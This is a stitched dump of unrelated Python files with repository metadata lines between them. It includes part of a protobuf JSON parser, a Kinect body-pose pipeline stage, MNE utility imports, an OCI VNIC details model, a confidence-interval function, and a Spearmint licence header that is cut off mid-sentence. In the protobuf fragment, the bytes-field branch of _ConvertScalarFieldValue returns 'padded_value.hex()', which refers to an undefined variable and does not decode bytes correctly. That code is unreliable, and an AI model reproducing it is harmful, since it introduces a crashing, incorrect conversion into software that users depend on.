"""Convert a JSON representation into ListValue message."""
if not isinstance(value, list):
raise ParseError("ListValue must be in [] which is {0}.".format(value))
message.ClearField("values")
for item in value:
self._ConvertValueMessage(item, message.values.add())
def _ConvertStructMessage(self, value, message):
"""Convert a JSON representation into Struct message."""
if not isinstance(value, dict):
raise ParseError("Struct must be in a dict which is {0}.".format(value))
# Clear will mark the struct as modified so it will be created even if
# there are no values.
message.Clear()
for key in value:
self._ConvertValueMessage(value[key], message.fields[key])
return
def _ConvertWrapperMessage(self, value, message):
"""Convert a JSON representation into Wrapper message."""
field = message.DESCRIPTOR.fields_by_name["value"]
setattr(message, "value", _ConvertScalarFieldValue(value, field))
def _ConvertMapFieldValue(self, value, message, field):
"""Convert map field value for a message map field.
Args:
value: A JSON object to convert the map field value.
message: A protocol message to record the converted data.
field: The descriptor of the map field to be converted.
Raises:
ParseError: In case of convert problems.
"""
if not isinstance(value, dict):
raise ParseError(
"Map field {0} must be in a dict which is {1}.".format(
field.name, value
)
)
key_field = field.message_type.fields_by_name["key"]
value_field = field.message_type.fields_by_name["value"]
for key in value:
key_value = _ConvertScalarFieldValue(key, key_field, True)
if value_field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
self.ConvertMessage(value[key], getattr(message, field.name)[key_value])
else:
getattr(message, field.name)[key_value] = _ConvertScalarFieldValue(
value[key], value_field
)
def _ConvertScalarFieldValue(value, field, require_str=False):
"""Convert a single scalar field value.
Args:
value: A scalar value to convert the scalar field value.
field: The descriptor of the field to convert.
require_str: If True, the field value must be a str.
Returns:
The converted scalar field value
Raises:
ParseError: In case of convert problems.
"""
if field.cpp_type in _INT_TYPES:
return _ConvertInteger(value)
elif field.cpp_type in _FLOAT_TYPES:
return _ConvertFloat(value, field)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
return _ConvertBool(value, require_str)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
if isinstance(value, str):
encoded = value.encode("utf-8")
else:
encoded = value
return padded_value.hex()
else:
# Checking for unpaired surrogates appears to be unreliable,
# depending on the specific Python version, so we check manually.
if _UNPAIRED_SURROGATE_PATTERN.search(value):
raise ParseError("Unpaired surrogate")
return value
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
# Convert an enum value.
enum_value = field.enum_type.values_by_name.get(value, None)
if enum_value is None:
try:
number = int(value)
enum_value = field.enum_type.values_by_number.get(number, None)
except ValueError:
raise ParseError(
"Invalid enum value {0} for enum type {1}.".format(
value, field.enum_type.full_name
)
)
if enum_value is None:
if field.file.syntax == "proto3":
# Proto3 accepts unknown enums.
return number
raise ParseError(
"Invalid enum value {0} for enum type {1}.".format(
value, field.enum_type.full_name
)
)
return enum_value.number
def _ConvertInteger(value):
"""Convert an integer.
Args:
value: A scalar value to convert.
Returns:
The integer value.
Raises:
ParseError: If an integer couldn't be consumed.
"""
if isinstance(value, float) and not value.is_integer():
raise ParseError("Couldn't parse integer: {0}.".format(value))
if isinstance(value, str) and value.find(" ") != -1:
raise ParseError('Couldn\'t parse integer: "{0}".'.format(value))
if isinstance(value, bool):
raise ParseError(
"Bool value {0} is not acceptable for " "integer field.".format(value)
)
return int(value)
def _ConvertFloat(value, field):
"""Convert an floating point number."""
if isinstance(value, float):
if math.isnan(value):
raise ParseError('Couldn\'t parse NaN, use quoted "NaN" instead.')
if math.isinf(value):
if value > 0:
raise ParseError(
"Couldn't parse Infinity or value too large, "
'use quoted "Infinity" instead.'
)
else:
raise ParseError(
"Couldn't parse -Infinity or value too small, "
'use quoted "-Infinity" instead.'
)
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_FLOAT:
# pylint: disable=protected-access
if value > type_checkers._FLOAT_MAX:
raise ParseError("Float value too large")
# pylint: disable=protected-access
if value < type_checkers._FLOAT_MIN:
raise ParseError("Float value too small")
if value == "nan":
raise ParseError('Couldn\'t parse float "nan", use "NaN" instead.')
try:
# Assume Python compatible syntax.
return float(value)
except ValueError:
# Check alternative spellings.
if value == _NEG_INFINITY:
return float("-inf")
elif value == _INFINITY:
return float("inf")
elif value == _NAN:
return float("nan")
else:
raise ParseError("Couldn't parse float: {0}.".format(value))
def _ConvertBool(value, require_str):
"""Convert a boolean value.
Args:
value: A scalar value to convert.
require_str: If True, value must be a str.
Returns:
The bool parsed.
Raises:
ParseError: If a boolean value couldn't be consumed.
"""
if require_str:
if value == "true":
return True
elif value == "false":
return False
else:
raise ParseError('Expected "true" or "false", not {0}.'.format(value))
if not isinstance(value, bool):
raise ParseError("Expected true or false without quotes.")
return value
_WKTJSONMETHODS = {
"google.protobuf.Any": ["_AnyMessageToJsonObject", "_ConvertAnyMessage"],
"google.protobuf.Duration": [
"_GenericMessageToJsonObject",
"_ConvertGenericMessage",
],
"google.protobuf.FieldMask": [
"_GenericMessageToJsonObject",
"_ConvertGenericMessage",
],
"google.protobuf.ListValue": [
"_ListValueMessageToJsonObject",
"_ConvertListValueMessage",
],
"google.protobuf.Struct": ["_StructMessageToJsonObject", "_ConvertStructMessage"],
"google.protobuf.Timestamp": [
"_GenericMessageToJsonObject",
"_ConvertGenericMessage",
],
"google.protobuf.Value": ["_ValueMessageToJsonObject", "_ConvertValueMessage"],
}
| 39.897186 | 90 | 0.600136 |
ace746486874813f51d5505e1799511ea2783177 | 2,127 | py | Python | src/blocks/body_pose.py | wangxihao/rgbd-kinect-pose | 03180723c99759ba2500bcd42b5fe7a1d26eb507 | [
"MIT"
] | 1 | 2022-02-07T06:12:26.000Z | 2022-02-07T06:12:26.000Z | src/blocks/body_pose.py | wangxihao/rgbd-kinect-pose | 03180723c99759ba2500bcd42b5fe7a1d26eb507 | [
"MIT"
] | null | null | null | src/blocks/body_pose.py | wangxihao/rgbd-kinect-pose | 03180723c99759ba2500bcd42b5fe7a1d26eb507 | [
"MIT"
] | null | null | null | import os.path as osp
import numpy as np
import time
import torch
from multiprocessing_pipeline import Assembler, Processor, Dissembler
from multiprocessing_pipeline import QueueMsg, QueueData, MetaMsg
from body_pose.inferer import Inferer
class BodyPose(Processor):
def __init__(
self,
name, msg_queue, input_queue, output_queue, assembler_input_queue,
data_dirpath, processor_config, pykinect_data_dp,
**kwargs
):
Processor.__init__(self, name, msg_queue, input_queue, output_queue, assembler_input_queue, **kwargs)
self.data_dirpath = data_dirpath
self.processor_config = processor_config
self.pykinect_data_dp = pykinect_data_dp
self.log_level = processor_config.get('log_level', 2)
self.device = torch.device(self.processor_config['device'])
self.gender = self.processor_config['gender']
self.beta = np.load(osp.join(
self.data_dirpath,
self.processor_config['person_shape_path'],
'betas.npy'
))
self.model_dp = osp.join(self.data_dirpath,
self.processor_config['model_path'])
self.inferer = None
self.index = -1
self.output_count = 0
def process_value(self, x):
self.index += 1
if self.inferer is None:
self.inferer = Inferer(
model_dp=self.model_dp,
checkpoint=self.processor_config['checkpoint'],
device=self.device,
beta=self.beta,
gender=self.gender,
pykinect_data_dp=self.pykinect_data_dp
)
kinect_joints = x['body_pose']
kinect_confs = x['body_conf']
inf_result = self.inferer.inf(kinect_joints, kinect_confs)
inf_result['time'] = x['time']
inf_result['is_close_hands'] = x['is_close_hands']
if self.output_count == 0:
if self.log_level >= 1:
print(f'{self.subblock_name} working')
self.output_count += 1
return inf_result
def destructor(self):
pass
| 31.279412 | 109 | 0.623883 |
ace7465479e36bd2ecb576b4fea039099be69059 | 3,980 | py | Python | mne/utils/__init__.py | Gaoqunxia/mne-python | 71a854d8eafe21676e545d8286b51422f34b26c3 | [
"BSD-3-Clause"
] | 1 | 2019-12-11T05:07:08.000Z | 2019-12-11T05:07:08.000Z | mne/utils/__init__.py | Gaoqunxia/mne-python | 71a854d8eafe21676e545d8286b51422f34b26c3 | [
"BSD-3-Clause"
] | null | null | null | mne/utils/__init__.py | Gaoqunxia/mne-python | 71a854d8eafe21676e545d8286b51422f34b26c3 | [
"BSD-3-Clause"
] | null | null | null | # # # WARNING # # #
# This list must also be updated in doc/_templates/autosummary/class.rst if it
# is changed here!
_doc_special_members = ('__contains__', '__getitem__', '__iter__', '__len__',
'__add__', '__sub__', '__mul__', '__div__',
'__neg__', '__hash__')
from ._bunch import Bunch, BunchConst, BunchConstNamed
from .check import (check_fname, check_version, check_random_state,
_check_fname, _check_subject, _check_pandas_installed,
_check_pandas_index_arguments, _check_mayavi_version,
_check_event_id, _check_ch_locs, _check_compensation_grade,
_check_if_nan, _is_numeric, _ensure_int, _check_preload,
_validate_type, _check_info_inv, _check_pylsl_installed,
_check_channels_spatial_filter, _check_one_ch_type,
_check_rank, _check_option, _check_depth, _check_combine,
_check_path_like, _check_src_normal, _check_stc_units,
_check_pyqt5_version)
from .config import (set_config, get_config, get_config_path, set_cache_dir,
set_memmap_min_size, get_subjects_dir, _get_stim_channel,
sys_info, _get_extra_data_path, _get_root_dir,
_get_call_line, _get_numpy_libs)
from .docs import (copy_function_doc_to_method_doc, copy_doc, linkcode_resolve,
open_docs, deprecated, fill_doc, copy_base_doc_to_subclass_doc)
from .fetching import _fetch_file, _url_to_local_path
from ._logging import (verbose, logger, set_log_level, set_log_file,
use_log_level, catch_logging, warn, filter_out_warnings,
ETSContext, wrapped_stdout)
from .misc import (run_subprocess, _pl, _clean_names, pformat, _file_like,
_explain_exception, _get_argvalues, sizeof_fmt,
running_subprocess, _DefaultEventParser)
from .progressbar import ProgressBar
from ._testing import (run_tests_if_main, run_command_if_main,
requires_sklearn,
requires_version, requires_nibabel, requires_mayavi,
requires_good_network, requires_mne, requires_pandas,
requires_h5py, traits_test, requires_pysurfer,
ArgvSetter, SilenceStdout, has_freesurfer, has_mne_c,
_TempDir, has_nibabel, _import_mlab, buggy_mkl_svd,
requires_numpydoc, requires_tvtk, requires_freesurfer,
requires_nitime, requires_dipy,
requires_neuromag2ft, requires_pylsl, assert_object_equal,
assert_and_remove_boundary_annot, _raw_annot,
assert_dig_allclose, assert_meg_snr, assert_snr,
assert_stcs_equal, modified_env)
from .numerics import (hashfunc, _compute_row_norms,
_reg_pinv, random_permutation, _reject_data_segments,
compute_corr, _get_inst_data, array_split_idx,
sum_squared, split_list, _gen_events, create_slices,
_time_mask, _freq_mask, grand_average, object_diff,
object_hash, object_size, _apply_scaling_cov,
_undo_scaling_cov, _apply_scaling_array,
_undo_scaling_array, _scaled_array, _replace_md5, _PCA,
_mask_to_onsets_offsets, _array_equal_nan,
_julian_to_cal, _cal_to_julian, _dt_to_julian,
_julian_to_dt, _dt_to_stamp, _stamp_to_dt,
_check_dt)
from .mixin import (SizeMixin, GetEpochsMixin, _prepare_read_metadata,
_prepare_write_metadata, _FakeNoPandas, ShiftTimeMixin)
from .linalg import (_svd_lwork, _repeated_svd,
dgesdd, dgemm, zgemm, dgemv, ddot, LinAlgError, eigh)
| 64.193548 | 82 | 0.644975 |
ace74708c33f5fcf59a399de865372d78ee63e13 | 14,682 | py | Python | src/oci/core/models/instance_configuration_create_vnic_details.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/core/models/instance_configuration_create_vnic_details.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/core/models/instance_configuration_create_vnic_details.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class InstanceConfigurationCreateVnicDetails(object):
"""
Contains the properties of the VNIC for an instance configuration. See :class:`CreateVnicDetails`
and `Instance Configurations`__ for more information.
__ https://docs.cloud.oracle.com/iaas/Content/Compute/Concepts/instancemanagement.htm#config
"""
def __init__(self, **kwargs):
"""
Initializes a new InstanceConfigurationCreateVnicDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param assign_public_ip:
The value to assign to the assign_public_ip property of this InstanceConfigurationCreateVnicDetails.
:type assign_public_ip: bool
:param assign_private_dns_record:
The value to assign to the assign_private_dns_record property of this InstanceConfigurationCreateVnicDetails.
:type assign_private_dns_record: bool
:param defined_tags:
The value to assign to the defined_tags property of this InstanceConfigurationCreateVnicDetails.
:type defined_tags: dict(str, dict(str, object))
:param display_name:
The value to assign to the display_name property of this InstanceConfigurationCreateVnicDetails.
:type display_name: str
:param freeform_tags:
The value to assign to the freeform_tags property of this InstanceConfigurationCreateVnicDetails.
:type freeform_tags: dict(str, str)
:param hostname_label:
The value to assign to the hostname_label property of this InstanceConfigurationCreateVnicDetails.
:type hostname_label: str
:param nsg_ids:
The value to assign to the nsg_ids property of this InstanceConfigurationCreateVnicDetails.
:type nsg_ids: list[str]
:param private_ip:
The value to assign to the private_ip property of this InstanceConfigurationCreateVnicDetails.
:type private_ip: str
:param skip_source_dest_check:
The value to assign to the skip_source_dest_check property of this InstanceConfigurationCreateVnicDetails.
:type skip_source_dest_check: bool
:param subnet_id:
The value to assign to the subnet_id property of this InstanceConfigurationCreateVnicDetails.
:type subnet_id: str
"""
self.swagger_types = {
'assign_public_ip': 'bool',
'assign_private_dns_record': 'bool',
'defined_tags': 'dict(str, dict(str, object))',
'display_name': 'str',
'freeform_tags': 'dict(str, str)',
'hostname_label': 'str',
'nsg_ids': 'list[str]',
'private_ip': 'str',
'skip_source_dest_check': 'bool',
'subnet_id': 'str'
}
self.attribute_map = {
'assign_public_ip': 'assignPublicIp',
'assign_private_dns_record': 'assignPrivateDnsRecord',
'defined_tags': 'definedTags',
'display_name': 'displayName',
'freeform_tags': 'freeformTags',
'hostname_label': 'hostnameLabel',
'nsg_ids': 'nsgIds',
'private_ip': 'privateIp',
'skip_source_dest_check': 'skipSourceDestCheck',
'subnet_id': 'subnetId'
}
self._assign_public_ip = None
self._assign_private_dns_record = None
self._defined_tags = None
self._display_name = None
self._freeform_tags = None
self._hostname_label = None
self._nsg_ids = None
self._private_ip = None
self._skip_source_dest_check = None
self._subnet_id = None
@property
def assign_public_ip(self):
"""
Gets the assign_public_ip of this InstanceConfigurationCreateVnicDetails.
Whether the VNIC should be assigned a public IP address. See the `assignPublicIp` attribute of :class:`CreateVnicDetails`
for more information.
:return: The assign_public_ip of this InstanceConfigurationCreateVnicDetails.
:rtype: bool
"""
return self._assign_public_ip
@assign_public_ip.setter
def assign_public_ip(self, assign_public_ip):
"""
Sets the assign_public_ip of this InstanceConfigurationCreateVnicDetails.
Whether the VNIC should be assigned a public IP address. See the `assignPublicIp` attribute of :class:`CreateVnicDetails`
for more information.
:param assign_public_ip: The assign_public_ip of this InstanceConfigurationCreateVnicDetails.
:type: bool
"""
self._assign_public_ip = assign_public_ip
@property
def assign_private_dns_record(self):
"""
Gets the assign_private_dns_record of this InstanceConfigurationCreateVnicDetails.
Whether the VNIC should be assigned a private DNS record. See the `assignPrivateDnsRecord` attribute of :class:`CreateVnicDetails`
for more information.
:return: The assign_private_dns_record of this InstanceConfigurationCreateVnicDetails.
:rtype: bool
"""
return self._assign_private_dns_record
@assign_private_dns_record.setter
def assign_private_dns_record(self, assign_private_dns_record):
"""
Sets the assign_private_dns_record of this InstanceConfigurationCreateVnicDetails.
Whether the VNIC should be assigned a private DNS record. See the `assignPrivateDnsRecord` attribute of :class:`CreateVnicDetails`
for more information.
:param assign_private_dns_record: The assign_private_dns_record of this InstanceConfigurationCreateVnicDetails.
:type: bool
"""
self._assign_private_dns_record = assign_private_dns_record
@property
def defined_tags(self):
"""
Gets the defined_tags of this InstanceConfigurationCreateVnicDetails.
Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:return: The defined_tags of this InstanceConfigurationCreateVnicDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this InstanceConfigurationCreateVnicDetails.
Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:param defined_tags: The defined_tags of this InstanceConfigurationCreateVnicDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
@property
def display_name(self):
"""
Gets the display_name of this InstanceConfigurationCreateVnicDetails.
A user-friendly name. Does not have to be unique, and it's changeable.
Avoid entering confidential information.
:return: The display_name of this InstanceConfigurationCreateVnicDetails.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""
Sets the display_name of this InstanceConfigurationCreateVnicDetails.
A user-friendly name. Does not have to be unique, and it's changeable.
Avoid entering confidential information.
:param display_name: The display_name of this InstanceConfigurationCreateVnicDetails.
:type: str
"""
self._display_name = display_name
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this InstanceConfigurationCreateVnicDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:return: The freeform_tags of this InstanceConfigurationCreateVnicDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this InstanceConfigurationCreateVnicDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:param freeform_tags: The freeform_tags of this InstanceConfigurationCreateVnicDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def hostname_label(self):
"""
Gets the hostname_label of this InstanceConfigurationCreateVnicDetails.
The hostname for the VNIC's primary private IP.
See the `hostnameLabel` attribute of :class:`CreateVnicDetails` for more information.
:return: The hostname_label of this InstanceConfigurationCreateVnicDetails.
:rtype: str
"""
return self._hostname_label
@hostname_label.setter
def hostname_label(self, hostname_label):
"""
Sets the hostname_label of this InstanceConfigurationCreateVnicDetails.
The hostname for the VNIC's primary private IP.
See the `hostnameLabel` attribute of :class:`CreateVnicDetails` for more information.
:param hostname_label: The hostname_label of this InstanceConfigurationCreateVnicDetails.
:type: str
"""
self._hostname_label = hostname_label
@property
def nsg_ids(self):
"""
Gets the nsg_ids of this InstanceConfigurationCreateVnicDetails.
A list of the OCIDs of the network security groups (NSGs) to add the VNIC to. For more
information about NSGs, see
:class:`NetworkSecurityGroup`.
:return: The nsg_ids of this InstanceConfigurationCreateVnicDetails.
:rtype: list[str]
"""
return self._nsg_ids
@nsg_ids.setter
def nsg_ids(self, nsg_ids):
"""
Sets the nsg_ids of this InstanceConfigurationCreateVnicDetails.
A list of the OCIDs of the network security groups (NSGs) to add the VNIC to. For more
information about NSGs, see
:class:`NetworkSecurityGroup`.
:param nsg_ids: The nsg_ids of this InstanceConfigurationCreateVnicDetails.
:type: list[str]
"""
self._nsg_ids = nsg_ids
@property
def private_ip(self):
"""
Gets the private_ip of this InstanceConfigurationCreateVnicDetails.
A private IP address of your choice to assign to the VNIC.
See the `privateIp` attribute of :class:`CreateVnicDetails` for more information.
:return: The private_ip of this InstanceConfigurationCreateVnicDetails.
:rtype: str
"""
return self._private_ip
@private_ip.setter
def private_ip(self, private_ip):
"""
Sets the private_ip of this InstanceConfigurationCreateVnicDetails.
A private IP address of your choice to assign to the VNIC.
See the `privateIp` attribute of :class:`CreateVnicDetails` for more information.
:param private_ip: The private_ip of this InstanceConfigurationCreateVnicDetails.
:type: str
"""
self._private_ip = private_ip
@property
def skip_source_dest_check(self):
"""
Gets the skip_source_dest_check of this InstanceConfigurationCreateVnicDetails.
Whether the source/destination check is disabled on the VNIC.
See the `skipSourceDestCheck` attribute of :class:`CreateVnicDetails` for more information.
:return: The skip_source_dest_check of this InstanceConfigurationCreateVnicDetails.
:rtype: bool
"""
return self._skip_source_dest_check
@skip_source_dest_check.setter
def skip_source_dest_check(self, skip_source_dest_check):
"""
Sets the skip_source_dest_check of this InstanceConfigurationCreateVnicDetails.
Whether the source/destination check is disabled on the VNIC.
See the `skipSourceDestCheck` attribute of :class:`CreateVnicDetails` for more information.
:param skip_source_dest_check: The skip_source_dest_check of this InstanceConfigurationCreateVnicDetails.
:type: bool
"""
self._skip_source_dest_check = skip_source_dest_check
@property
def subnet_id(self):
"""
Gets the subnet_id of this InstanceConfigurationCreateVnicDetails.
The OCID of the subnet to create the VNIC in.
See the `subnetId` attribute of :class:`CreateVnicDetails` for more information.
:return: The subnet_id of this InstanceConfigurationCreateVnicDetails.
:rtype: str
"""
return self._subnet_id
@subnet_id.setter
def subnet_id(self, subnet_id):
"""
Sets the subnet_id of this InstanceConfigurationCreateVnicDetails.
The OCID of the subnet to create the VNIC in.
See the `subnetId` attribute of :class:`CreateVnicDetails` for more information.
:param subnet_id: The subnet_id of this InstanceConfigurationCreateVnicDetails.
:type: str
"""
self._subnet_id = subnet_id
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 37.549872 | 245 | 0.686078 |
ace749381b361e9ae563181c48d3b420a5180dfc | 261 | py | Python | math/confidence_interval.py | IvoryLu/data-processing | 65d91537dea777d037e9a419a355a0c8493aa19c | [
"BSD-3-Clause"
] | null | null | null | math/confidence_interval.py | IvoryLu/data-processing | 65d91537dea777d037e9a419a355a0c8493aa19c | [
"BSD-3-Clause"
] | null | null | null | math/confidence_interval.py | IvoryLu/data-processing | 65d91537dea777d037e9a419a355a0c8493aa19c | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import scipy.stats
def mean_confidence_interval(data, confidence=0.95):
a = 1.0 * np.array(data)
n = len(a)
m, se = np.mean(a), scipy.stats.sem(a)
h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)
return m, m-h, m+h
| 26.1 | 58 | 0.613027 |
ace7495b2d7812d540508532d6def074615212e4 | 10,398 | py | Python | spearmint/tests/kernels/test_scale.py | jatinarora2409/Spearmint | a209eb8aa7d5d93f2fdca6cff50dc17a94d926ab | [
"RSA-MD"
] | 1,590 | 2015-01-02T19:11:29.000Z | 2022-03-31T13:36:16.000Z | spearmint/tests/kernels/test_scale.py | jatinarora2409/Spearmint | a209eb8aa7d5d93f2fdca6cff50dc17a94d926ab | [
"RSA-MD"
] | 99 | 2015-02-20T06:45:49.000Z | 2021-12-06T13:28:44.000Z | spearmint/tests/kernels/test_scale.py | jatinarora2409/Spearmint | a209eb8aa7d5d93f2fdca6cff50dc17a94d926ab | [
"RSA-MD"
] | 366 | 2015-01-17T20:29:49.000Z | 2022-02-21T16:22:31.000Z | # -*- coding: utf-8 -*-
# Spearmint
#
# Academic and Non-Commercial Research Use Software License and Terms
# of Use
#
# Spearmint is a software package to perform Bayesian optimization
# according to specific algorithms (the “Software”). The Software is
# designed to automatically run experiments (thus the code name
# 'spearmint') in a manner that iteratively adjusts a number of
# parameters so as to minimize some objective in as few runs as
# possible.
#
# The Software was developed by Ryan P. Adams, Michael Gelbart, and
# Jasper Snoek at Harvard University, Kevin Swersky at the
# University of Toronto (“Toronto”), and Hugo Larochelle at the
# Université de Sherbrooke (“Sherbrooke”), which assigned its rights
# in the Software to Socpra Sciences et Génie
# S.E.C. (“Socpra”). Pursuant to an inter-institutional agreement
# between the parties, it is distributed for free academic and
# non-commercial research use by the President and Fellows of Harvard
# College (“Harvard”).
#
# Using the Software indicates your agreement to be bound by the terms
# of this Software Use Agreement (“Agreement”). Absent your agreement
# to the terms below, you (the “End User”) have no rights to hold or
# use the Software whatsoever.
#
# Harvard agrees to grant hereunder the limited non-exclusive license
# to End User for the use of the Software in the performance of End
# User’s internal, non-commercial research and academic use at End
# User’s academic or not-for-profit research institution
# (“Institution”) on the following terms and conditions:
#
# 1. NO REDISTRIBUTION. The Software remains the property Harvard,
# Toronto and Socpra, and except as set forth in Section 4, End User
# shall not publish, distribute, or otherwise transfer or make
# available the Software to any other party.
#
# 2. NO COMMERCIAL USE. End User shall not use the Software for
# commercial purposes and any such use of the Software is expressly
# prohibited. This includes, but is not limited to, use of the
# Software in fee-for-service arrangements, core facilities or
# laboratories or to provide research services to (or in collaboration
# with) third parties for a fee, and in industry-sponsored
# collaborative research projects where any commercial rights are
# granted to the sponsor. If End User wishes to use the Software for
# commercial purposes or for any other restricted purpose, End User
# must execute a separate license agreement with Harvard.
#
# Requests for use of the Software for commercial purposes, please
# contact:
#
# Office of Technology Development
# Harvard University
# Smith Campus Center, Suite 727E
# 1350 Massachusetts Avenue
# Cambridge, MA 02138 USA
# Telephone: (617) 495-3067
# Facsimile: (617) 495-9568
# E-mail: otd@harvard.edu
#
# 3. OWNERSHIP AND COPYRIGHT NOTICE. Harvard, Toronto and Socpra own
# all intellectual property in the Software. End User shall gain no
# ownership to the Software. End User shall not remove or delete and
# shall retain in the Software, in any modifications to Software and
# in any Derivative Works, the copyright, trademark, or other notices
# pertaining to Software as provided with the Software.
#
# 4. DERIVATIVE WORKS. End User may create and use Derivative Works,
# as such term is defined under U.S. copyright laws, provided that any
# such Derivative Works shall be restricted to non-commercial,
# internal research and academic use at End User’s Institution. End
# User may distribute Derivative Works to other Institutions solely
# for the performance of non-commercial, internal research and
# academic use on terms substantially similar to this License and
# Terms of Use.
#
# 5. FEEDBACK. In order to improve the Software, comments from End
# Users may be useful. End User agrees to provide Harvard with
# feedback on the End User’s use of the Software (e.g., any bugs in
# the Software, the user experience, etc.). Harvard is permitted to
# use such information provided by End User in making changes and
# improvements to the Software without compensation or an accounting
# to End User.
#
# 6. NON ASSERT. End User acknowledges that Harvard, Toronto and/or
# Sherbrooke or Socpra may develop modifications to the Software that
# may be based on the feedback provided by End User under Section 5
# above. Harvard, Toronto and Sherbrooke/Socpra shall not be
# restricted in any way by End User regarding their use of such
# information. End User acknowledges the right of Harvard, Toronto
# and Sherbrooke/Socpra to prepare, publish, display, reproduce,
# transmit and or use modifications to the Software that may be
# substantially similar or functionally equivalent to End User’s
# modifications and/or improvements if any. In the event that End
# User obtains patent protection for any modification or improvement
# to Software, End User agrees not to allege or enjoin infringement of
# End User’s patent against Harvard, Toronto or Sherbrooke or Socpra,
# or any of the researchers, medical or research staff, officers,
# directors and employees of those institutions.
#
# 7. PUBLICATION & ATTRIBUTION. End User has the right to publish,
# present, or share results from the use of the Software. In
# accordance with customary academic practice, End User will
# acknowledge Harvard, Toronto and Sherbrooke/Socpra as the providers
# of the Software and may cite the relevant reference(s) from the
# following list of publications:
#
# Practical Bayesian Optimization of Machine Learning Algorithms
# Jasper Snoek, Hugo Larochelle and Ryan Prescott Adams
# Neural Information Processing Systems, 2012
#
# Multi-Task Bayesian Optimization
# Kevin Swersky, Jasper Snoek and Ryan Prescott Adams
# Advances in Neural Information Processing Systems, 2013
#
# Input Warping for Bayesian Optimization of Non-stationary Functions
# Jasper Snoek, Kevin Swersky, Richard Zemel and Ryan Prescott Adams
# Preprint, arXiv:1402.0929, http://arxiv.org/abs/1402.0929, 2013
#
# Bayesian Optimization and Semiparametric Models with Applications to
# Assistive Technology Jasper Snoek, PhD Thesis, University of
# Toronto, 2013
#
# 8. NO WARRANTIES. THE SOFTWARE IS PROVIDED "AS IS." TO THE FULLEST
# EXTENT PERMITTED BY LAW, HARVARD, TORONTO AND SHERBROOKE AND SOCPRA
# HEREBY DISCLAIM ALL WARRANTIES OF ANY KIND (EXPRESS, IMPLIED OR
# OTHERWISE) REGARDING THE SOFTWARE, INCLUDING BUT NOT LIMITED TO ANY
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE, OWNERSHIP, AND NON-INFRINGEMENT. HARVARD, TORONTO AND
# SHERBROOKE AND SOCPRA MAKE NO WARRANTY ABOUT THE ACCURACY,
# RELIABILITY, COMPLETENESS, TIMELINESS, SUFFICIENCY OR QUALITY OF THE
# SOFTWARE. HARVARD, TORONTO AND SHERBROOKE AND SOCPRA DO NOT WARRANT
# THAT THE SOFTWARE WILL OPERATE WITHOUT ERROR OR INTERRUPTION.
#
# 9. LIMITATIONS OF LIABILITY AND REMEDIES. USE OF THE SOFTWARE IS AT
# END USER’S OWN RISK. IF END USER IS DISSATISFIED WITH THE SOFTWARE,
# ITS EXCLUSIVE REMEDY IS TO STOP USING IT. IN NO EVENT SHALL
# HARVARD, TORONTO OR SHERBROOKE OR SOCPRA BE LIABLE TO END USER OR
# ITS INSTITUTION, IN CONTRACT, TORT OR OTHERWISE, FOR ANY DIRECT,
# INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR OTHER
# DAMAGES OF ANY KIND WHATSOEVER ARISING OUT OF OR IN CONNECTION WITH
# THE SOFTWARE, EVEN IF HARVARD, TORONTO OR SHERBROOKE OR SOCPRA IS
# NEGLIGENT OR OTHERWISE AT FAULT, AND REGARDLESS OF WHETHER HARVARD,
